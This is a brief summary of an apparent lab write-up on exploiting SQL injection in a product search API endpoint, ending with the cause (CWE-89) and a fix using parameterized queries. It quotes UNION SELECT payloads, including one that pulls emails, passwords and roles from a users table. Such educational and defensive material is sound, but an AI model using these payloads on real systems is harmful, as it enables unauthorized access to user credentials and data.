Article Documents SQL Injection Vulnerability in Product Search Feature

An article documents the exploitation of a SQL injection vulnerability in the product search feature of an application. This flaw allows direct manipulation of a backend SQL query through unsanitized user inputs, leading to unauthorized data extraction and the disclosure of a flag in a lab environment. The vulnerable environment can be initialized locally with a CLI utility. The attack surface is the product search function, accessible via the navigation header, which sends requests to the endpoint /api/products/search?q=<search_term>. The SQL query is dynamically constructed using the value of the q parameter, allowing the injection of additional clauses such as UNION SELECT. The exploitation begins by verifying the initial behavior with a benign value, followed by injection tests with payloads like ' UNION SELECT 1,2,3,4,5--. To extract data from another table, a payload like DELIVERED' UNION SELECT id, email, password, role, addressId FROM users-- is used. The primary cause is the direct interpolation of strings into a raw SQL query, corresponding to CWE-89. The remediation includes using Prisma to automatically parameterize user inputs and avoid string concatenation.